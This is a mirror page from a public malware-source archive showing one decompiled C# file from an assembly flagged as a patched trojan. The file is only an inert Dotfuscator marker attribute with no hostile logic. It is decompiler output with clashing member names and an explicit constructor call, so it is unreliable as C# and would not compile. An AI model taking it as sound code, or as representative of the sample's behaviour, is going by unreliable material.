mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
34 lines
953 B
C#
34 lines
953 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: DotfuscatorAttribute
|
|||
|
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
|
|||
|
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
[AttributeUsage(AttributeTargets.Assembly)]
|
|||
|
[ComVisible(false)]
|
|||
|
public sealed class DotfuscatorAttribute : Attribute
|
|||
|
{
|
|||
|
private string a;
|
|||
|
private int c;
|
|||
|
|
|||
|
public DotfuscatorAttribute(string a, int c)
|
|||
|
{
|
|||
|
DotfuscatorAttribute dotfuscatorAttribute = this;
|
|||
|
// ISSUE: explicit constructor call
|
|||
|
dotfuscatorAttribute.\u002Ector();
|
|||
|
dotfuscatorAttribute.a = a;
|
|||
|
this.c = c;
|
|||
|
}
|
|||
|
|
|||
|
public string A => this.a;
|
|||
|
|
|||
|
public string a() => this.a;
|
|||
|
|
|||
|
public int C => this.c;
|
|||
|
|
|||
|
public int c() => this.c;
|
|||
|
}
|